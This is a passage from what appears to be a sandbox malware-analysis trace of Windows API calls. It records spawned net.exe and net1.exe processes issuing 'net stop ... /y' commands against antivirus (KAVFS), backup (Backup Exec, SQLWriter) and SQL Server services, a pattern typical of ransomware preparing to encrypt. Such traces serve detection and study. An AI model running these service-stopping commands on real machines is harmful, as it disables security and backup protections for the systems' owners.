_wcsicmp (_String1="group", _String2="msftesql$PROD") returned -6 [0125.431] _wcsicmp (_String1="groups", _String2="msftesql$PROD") returned -6 [0125.431] _wcsicmp (_String1="help", _String2="msftesql$PROD") returned -5 [0125.431] _wcsicmp (_String1="helpmsg", _String2="msftesql$PROD") returned -5 [0125.431] _wcsicmp (_String1="localgroup", _String2="msftesql$PROD") returned -1 [0125.431] _wcsicmp (_String1="pause", _String2="msftesql$PROD") returned 3 [0125.431] _wcsicmp (_String1="session", _String2="msftesql$PROD") returned 6 [0125.431] _wcsicmp (_String1="sessions", _String2="msftesql$PROD") returned 6 [0125.431] _wcsicmp (_String1="sess", _String2="msftesql$PROD") returned 6 [0125.432] _wcsicmp (_String1="share", _String2="msftesql$PROD") returned 6 [0125.432] _wcsicmp (_String1="start", _String2="msftesql$PROD") returned 6 [0125.432] _wcsicmp (_String1="stats", _String2="msftesql$PROD") returned 6 [0125.432] _wcsicmp (_String1="statistics", _String2="msftesql$PROD") returned 6 [0125.432] _wcsicmp (_String1="stop", _String2="msftesql$PROD") returned 6 [0125.432] _wcsicmp (_String1="time", _String2="msftesql$PROD") returned 7 [0125.432] _wcsicmp (_String1="user", _String2="msftesql$PROD") returned 8 [0125.432] _wcsicmp (_String1="users", _String2="msftesql$PROD") returned 8 [0125.432] _wcsicmp (_String1="msg", _String2="msftesql$PROD") returned 1 [0125.432] _wcsicmp (_String1="messenger", _String2="msftesql$PROD") returned -14 [0125.432] _wcsicmp (_String1="receiver", _String2="msftesql$PROD") returned 5 [0125.432] _wcsicmp (_String1="rcv", _String2="msftesql$PROD") returned 5 [0125.432] _wcsicmp (_String1="netpopup", _String2="msftesql$PROD") returned 1 [0125.432] _wcsicmp (_String1="redirector", _String2="msftesql$PROD") returned 5 [0125.432] _wcsicmp (_String1="redir", _String2="msftesql$PROD") returned 5 [0125.432] _wcsicmp (_String1="rdr", _String2="msftesql$PROD") returned 5 [0125.432] _wcsicmp (_String1="workstation", _String2="msftesql$PROD") returned 10 [0125.432] _wcsicmp (_String1="work", _String2="msftesql$PROD") returned 10 [0125.432] _wcsicmp (_String1="wksta", _String2="msftesql$PROD") returned 10 [0125.432] _wcsicmp (_String1="prdr", _String2="msftesql$PROD") returned 3 [0125.432] _wcsicmp (_String1="devrdr", _String2="msftesql$PROD") returned -9 [0125.432] _wcsicmp (_String1="lanmanworkstation", _String2="msftesql$PROD") returned -1 [0125.432] _wcsicmp (_String1="server", _String2="msftesql$PROD") returned 6 [0125.432] _wcsicmp (_String1="svr", _String2="msftesql$PROD") returned 6 [0125.432] _wcsicmp (_String1="srv", _String2="msftesql$PROD") returned 6 [0125.432] _wcsicmp (_String1="lanmanserver", _String2="msftesql$PROD") returned -1 [0125.432] _wcsicmp (_String1="alerter", _String2="msftesql$PROD") returned -12 [0125.432] _wcsicmp (_String1="netlogon", _String2="msftesql$PROD") returned 1 [0125.433] _wcsupr (in: _String="msftesql$PROD" | out: _String="MSFTESQL$PROD") returned="MSFTESQL$PROD" [0125.433] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6754b0 [0125.794] GetServiceKeyNameW (in: hSCManager=0x6754b0, lpDisplayName="MSFTESQL$PROD", lpServiceName=0xe5aaf0, lpcchBuffer=0x1ff6c8 | out: lpServiceName="", lpcchBuffer=0x1ff6c8) returned 0 [0125.795] _wcsicmp (_String1="msg", _String2="MSFTESQL$PROD") returned 1 [0125.795] _wcsicmp (_String1="messenger", _String2="MSFTESQL$PROD") returned -14 [0125.795] _wcsicmp (_String1="receiver", _String2="MSFTESQL$PROD") returned 5 [0125.795] _wcsicmp (_String1="rcv", _String2="MSFTESQL$PROD") returned 5 [0125.795] _wcsicmp (_String1="redirector", _String2="MSFTESQL$PROD") returned 5 [0125.795] _wcsicmp (_String1="redir", _String2="MSFTESQL$PROD") returned 5 [0125.795] _wcsicmp (_String1="rdr", _String2="MSFTESQL$PROD") returned 5 [0125.795] _wcsicmp (_String1="workstation", _String2="MSFTESQL$PROD") returned 10 [0125.795] _wcsicmp (_String1="work", _String2="MSFTESQL$PROD") returned 10 [0125.795] _wcsicmp (_String1="wksta", _String2="MSFTESQL$PROD") returned 10 [0125.795] _wcsicmp (_String1="prdr", _String2="MSFTESQL$PROD") returned 3 [0125.795] _wcsicmp (_String1="devrdr", _String2="MSFTESQL$PROD") returned -9 [0125.795] _wcsicmp (_String1="lanmanworkstation", _String2="MSFTESQL$PROD") returned -1 [0125.795] _wcsicmp (_String1="server", _String2="MSFTESQL$PROD") returned 6 [0125.795] _wcsicmp (_String1="svr", _String2="MSFTESQL$PROD") returned 6 [0125.795] _wcsicmp (_String1="srv", _String2="MSFTESQL$PROD") returned 6 [0125.795] _wcsicmp (_String1="lanmanserver", _String2="MSFTESQL$PROD") returned -1 [0125.795] _wcsicmp (_String1="alerter", _String2="MSFTESQL$PROD") returned -12 [0125.795] _wcsicmp (_String1="netlogon", _String2="MSFTESQL$PROD") returned 1 [0125.795] NetServiceControl (in: servername=0x0, service="MSFTESQL$PROD", opcode=0x0, arg=0x0, bufptr=0x1ff6c4 | out: bufptr=0x1ff6c4) returned 0x889 [0125.797] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0125.797] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0125.797] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0125.799] GetFileType (hFile=0x0) returned 0x0 [0125.799] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x673ed0 [0125.799] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x673ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0125.799] WriteFile (in: hFile=0x0, lpBuffer=0x673ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1ff604, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff604, lpOverlapped=0x0) returned 0 [0125.799] LocalFree (hMem=0x673ed0) returned 0x0 [0125.799] GetFileType (hFile=0x0) returned 0x0 [0125.799] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x676178 [0125.799] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x676178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\ng", lpUsedDefaultChar=0x0) returned 2 [0125.799] WriteFile (in: hFile=0x0, lpBuffer=0x676178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ff604, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff604, lpOverlapped=0x0) returned 0 [0125.799] LocalFree (hMem=0x676178) returned 0x0 [0125.799] _ultow (in: _Dest=0x889, _Radix=2094644 | out: _Dest=0x889) returned="2185" [0125.799] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0125.799] GetFileType (hFile=0x0) returned 0x0 [0125.799] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x676178 [0125.799] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x676178, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0125.799] WriteFile (in: hFile=0x0, lpBuffer=0x676178, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1ff610, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff610, lpOverlapped=0x0) returned 0 [0125.799] LocalFree (hMem=0x676178) returned 0x0 [0125.799] GetFileType (hFile=0x0) returned 0x0 [0125.800] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x676178 [0125.800] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x676178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\ng", lpUsedDefaultChar=0x0) returned 2 [0125.800] WriteFile (in: hFile=0x0, lpBuffer=0x676178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ff610, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1ff610, lpOverlapped=0x0) returned 0 [0125.800] LocalFree (hMem=0x676178) returned 0x0 [0125.800] NetApiBufferFree (Buffer=0x671ae8) returned 0x0 [0125.800] NetApiBufferFree (Buffer=0x671b00) returned 0x0 [0125.800] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop msftesql$PROD /y" [0125.800] exit (_Code=2) Process: id = "275" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4dc83000" os_pid = "0x4c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop BackupExecDeviceMediaService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 673 os_tid = 0xe24 Process: id = "276" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4eb88000" os_pid = "0xbbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop MSSQL$SBSMONITORING /" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 674 os_tid = 0xc10 Process: id = "277" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x59a19000" os_pid = "0xc14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "114" os_parent_pid = "0xcf0" cmd_line = "C:\\Windows\\system32\\net1 stop KAVFS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 675 os_tid = 0xcfc [0125.369] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2bfbbc | out: lpSystemTimeAsFileTime=0x2bfbbc*(dwLowDateTime=0x1e76af30, dwHighDateTime=0x1d6f0d1)) [0125.369] GetCurrentProcessId () returned 0xc14 [0125.369] GetCurrentThreadId () returned 0xcfc [0125.369] GetTickCount () returned 0x1152962 [0125.369] QueryPerformanceCounter (in: lpPerformanceCount=0x2bfbb4 | out: lpPerformanceCount=0x2bfbb4*=24447028521) returned 1 [0125.370] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0125.370] __set_app_type (_Type=0x1) [0125.370] __p__fmode () returned 0x770331f4 [0125.370] __p__commode () returned 0x770331fc [0125.370] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0125.370] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0125.370] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.370] GetConsoleOutputCP () returned 0x1b5 [0125.370] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0125.371] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.374] sprintf_s (in: _DstBuf=0x2bfb74, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0125.374] setlocale (category=0, locale=".437") returned="English_United States.437" [0125.376] GetStdHandle (nStdHandle=0xfffffff5) returned 0x470 [0125.376] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0125.376] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop KAVFS /y" [0125.376] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2bf940, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0125.376] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x5e) returned 0x2e3ac8 [0125.376] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0125.376] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bfb44 | out: Buffer=0x2bfb44*=0x2e1ad0) returned 0x0 [0125.376] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2bfb44 | out: Buffer=0x2bfb44*=0x2e1ae8) returned 0x0 [0125.376] _fileno (_File=0x77032900) returned -2 [0125.376] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0125.376] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0125.376] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0125.377] _wcsicmp (_String1="config", _String2="stop") returned -16 [0125.377] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0125.377] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0125.377] _wcsicmp (_String1="file", _String2="stop") returned -13 [0125.377] _wcsicmp (_String1="files", _String2="stop") returned -13 [0125.377] _wcsicmp (_String1="group", _String2="stop") returned -12 [0125.377] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0125.377] _wcsicmp (_String1="help", _String2="stop") returned -11 [0125.377] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0125.377] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0125.377] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0125.377] _wcsicmp (_String1="session", _String2="stop") returned -15 [0125.377] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0125.377] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0125.377] _wcsicmp (_String1="share", _String2="stop") returned -12 [0125.377] _wcsicmp (_String1="start", _String2="stop") returned -14 [0125.377] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0125.377] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0125.377] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0125.377] _wcsicmp (_String1="accounts", _String2="KAVFS") returned -10 [0125.377] _wcsicmp (_String1="computer", _String2="KAVFS") returned -8 [0125.377] _wcsicmp (_String1="config", _String2="KAVFS") returned -8 [0125.377] _wcsicmp (_String1="continue", _String2="KAVFS") returned -8 [0125.377] _wcsicmp (_String1="cont", _String2="KAVFS") returned -8 [0125.377] _wcsicmp (_String1="file", _String2="KAVFS") returned -5 [0125.377] _wcsicmp (_String1="files", _String2="KAVFS") returned -5 [0125.377] _wcsicmp (_String1="group", _String2="KAVFS") returned -4 [0125.377] _wcsicmp (_String1="groups", _String2="KAVFS") returned -4 [0125.377] _wcsicmp (_String1="help", _String2="KAVFS") returned -3 [0125.377] _wcsicmp (_String1="helpmsg", _String2="KAVFS") returned -3 [0125.377] _wcsicmp (_String1="localgroup", _String2="KAVFS") returned 1 [0125.377] _wcsicmp (_String1="pause", _String2="KAVFS") returned 5 [0125.377] _wcsicmp (_String1="session", _String2="KAVFS") returned 8 [0125.377] _wcsicmp (_String1="sessions", _String2="KAVFS") returned 8 [0125.377] _wcsicmp (_String1="sess", _String2="KAVFS") returned 8 [0125.377] _wcsicmp (_String1="share", _String2="KAVFS") returned 8 [0125.377] _wcsicmp (_String1="start", _String2="KAVFS") returned 8 [0125.378] _wcsicmp (_String1="stats", _String2="KAVFS") returned 8 [0125.378] _wcsicmp (_String1="statistics", _String2="KAVFS") returned 8 [0125.378] _wcsicmp (_String1="stop", _String2="KAVFS") returned 8 [0125.378] _wcsicmp (_String1="time", _String2="KAVFS") returned 9 [0125.378] _wcsicmp (_String1="user", _String2="KAVFS") returned 10 [0125.378] _wcsicmp (_String1="users", _String2="KAVFS") returned 10 [0125.378] _wcsicmp (_String1="msg", _String2="KAVFS") returned 2 [0125.378] _wcsicmp (_String1="messenger", _String2="KAVFS") returned 2 [0125.378] _wcsicmp (_String1="receiver", _String2="KAVFS") returned 7 [0125.378] _wcsicmp (_String1="rcv", _String2="KAVFS") returned 7 [0125.378] _wcsicmp (_String1="netpopup", _String2="KAVFS") returned 3 [0125.378] _wcsicmp (_String1="redirector", _String2="KAVFS") returned 7 [0125.378] _wcsicmp (_String1="redir", _String2="KAVFS") returned 7 [0125.378] _wcsicmp (_String1="rdr", _String2="KAVFS") returned 7 [0125.378] _wcsicmp (_String1="workstation", _String2="KAVFS") returned 12 [0125.378] _wcsicmp (_String1="work", _String2="KAVFS") returned 12 [0125.378] _wcsicmp (_String1="wksta", _String2="KAVFS") returned 12 [0125.378] _wcsicmp (_String1="prdr", _String2="KAVFS") returned 5 [0125.378] _wcsicmp (_String1="devrdr", _String2="KAVFS") returned -7 [0125.378] _wcsicmp (_String1="lanmanworkstation", _String2="KAVFS") returned 1 [0125.378] _wcsicmp (_String1="server", _String2="KAVFS") returned 8 [0125.378] _wcsicmp (_String1="svr", _String2="KAVFS") returned 8 [0125.378] _wcsicmp (_String1="srv", _String2="KAVFS") returned 8 [0125.378] _wcsicmp (_String1="lanmanserver", _String2="KAVFS") returned 1 [0125.378] _wcsicmp (_String1="alerter", _String2="KAVFS") returned -10 [0125.378] _wcsicmp (_String1="netlogon", _String2="KAVFS") returned 3 [0125.378] _wcsupr (in: _String="KAVFS" | out: _String="KAVFS") returned="KAVFS" [0125.378] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2e5488 [0125.781] GetServiceKeyNameW (in: hSCManager=0x2e5488, lpDisplayName="KAVFS", lpServiceName=0xe5aaf0, lpcchBuffer=0x2bfae0 | out: lpServiceName="", lpcchBuffer=0x2bfae0) returned 0 [0125.781] _wcsicmp (_String1="msg", _String2="KAVFS") returned 2 [0125.781] _wcsicmp (_String1="messenger", _String2="KAVFS") returned 2 [0125.781] _wcsicmp (_String1="receiver", _String2="KAVFS") returned 7 [0125.781] _wcsicmp (_String1="rcv", _String2="KAVFS") returned 7 [0125.781] _wcsicmp (_String1="redirector", _String2="KAVFS") returned 7 [0125.782] _wcsicmp (_String1="redir", _String2="KAVFS") returned 7 [0125.782] _wcsicmp (_String1="rdr", _String2="KAVFS") returned 7 [0125.782] _wcsicmp (_String1="workstation", _String2="KAVFS") returned 12 [0125.782] _wcsicmp (_String1="work", _String2="KAVFS") returned 12 [0125.782] _wcsicmp (_String1="wksta", _String2="KAVFS") returned 12 [0125.782] _wcsicmp (_String1="prdr", _String2="KAVFS") returned 5 [0125.782] _wcsicmp (_String1="devrdr", _String2="KAVFS") returned -7 [0125.782] _wcsicmp (_String1="lanmanworkstation", _String2="KAVFS") returned 1 [0125.782] _wcsicmp (_String1="server", _String2="KAVFS") returned 8 [0125.782] _wcsicmp (_String1="svr", _String2="KAVFS") returned 8 [0125.782] _wcsicmp (_String1="srv", _String2="KAVFS") returned 8 [0125.782] _wcsicmp (_String1="lanmanserver", _String2="KAVFS") returned 1 [0125.782] _wcsicmp (_String1="alerter", _String2="KAVFS") returned -10 [0125.782] _wcsicmp (_String1="netlogon", _String2="KAVFS") returned 3 [0125.782] NetServiceControl (in: servername=0x0, service="KAVFS", opcode=0x0, arg=0x0, bufptr=0x2bfadc | out: bufptr=0x2bfadc) returned 0x889 [0125.783] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0125.783] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0125.784] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0125.785] GetFileType (hFile=0x0) returned 0x0 [0125.785] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2e3ea8 [0125.785] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2e3ea8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0125.785] WriteFile (in: hFile=0x0, lpBuffer=0x2e3ea8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2bfa1c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfa1c, lpOverlapped=0x0) returned 0 [0125.785] LocalFree (hMem=0x2e3ea8) returned 0x0 [0125.785] GetFileType (hFile=0x0) returned 0x0 [0125.785] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e6150 [0125.785] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e6150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2 [0125.785] WriteFile (in: hFile=0x0, lpBuffer=0x2e6150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bfa1c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfa1c, lpOverlapped=0x0) returned 0 [0125.786] LocalFree (hMem=0x2e6150) returned 0x0 [0125.786] _ultow (in: _Dest=0x889, _Radix=2882124 | out: _Dest=0x889) returned="2185" [0125.786] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0125.786] GetFileType (hFile=0x0) returned 0x0 [0125.786] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2e6150 [0125.786] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2e6150, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0125.786] WriteFile (in: hFile=0x0, lpBuffer=0x2e6150, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2bfa28, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfa28, lpOverlapped=0x0) returned 0 [0125.786] LocalFree (hMem=0x2e6150) returned 0x0 [0125.786] GetFileType (hFile=0x0) returned 0x0 [0125.786] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e6150 [0125.786] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e6150, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2 [0125.786] WriteFile (in: hFile=0x0, lpBuffer=0x2e6150, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bfa28, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bfa28, lpOverlapped=0x0) returned 0 [0125.786] LocalFree (hMem=0x2e6150) returned 0x0 [0125.786] NetApiBufferFree (Buffer=0x2e1ad0) returned 0x0 [0125.787] NetApiBufferFree (Buffer=0x2e1ae8) returned 0x0 [0125.787] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop KAVFS /y" [0125.787] exit (_Code=2) Process: id = "278" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5c9cc000" os_pid = "0xcbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "115" os_parent_pid = "0x718" cmd_line = "C:\\Windows\\system32\\net1 stop SQLWriter /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 676 os_tid = 0xc6c [0126.265] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33fc44 | out: lpSystemTimeAsFileTime=0x33fc44*(dwLowDateTime=0x1f00bef0, dwHighDateTime=0x1d6f0d1)) [0126.265] GetCurrentProcessId () returned 0xcbc [0126.265] GetCurrentThreadId () returned 0xc6c [0126.265] GetTickCount () returned 0x1152ceb [0126.265] QueryPerformanceCounter (in: lpPerformanceCount=0x33fc3c | out: lpPerformanceCount=0x33fc3c*=24536559532) returned 1 [0126.265] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0126.265] __set_app_type (_Type=0x1) [0126.265] __p__fmode () returned 0x770331f4 [0126.265] __p__commode () returned 0x770331fc [0126.265] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0126.265] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0126.266] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0126.266] GetConsoleOutputCP () returned 0x1b5 [0126.266] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0126.266] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.269] sprintf_s (in: _DstBuf=0x33fbfc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0126.269] setlocale (category=0, locale=".437") returned="English_United States.437" [0126.271] GetStdHandle (nStdHandle=0xfffffff5) returned 0x470 [0126.271] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0126.271] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLWriter /y" [0126.271] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x33f9c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0126.271] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x66) returned 0x733ad8 [0126.272] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0126.272] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x33fbcc | out: Buffer=0x33fbcc*=0x731ae0) returned 0x0 [0126.272] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x33fbcc | out: Buffer=0x33fbcc*=0x731af8) returned 0x0 [0126.272] _fileno (_File=0x77032900) returned -2 [0126.272] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0126.272] _wcsicmp (_String1="accounts", _String2="stop") 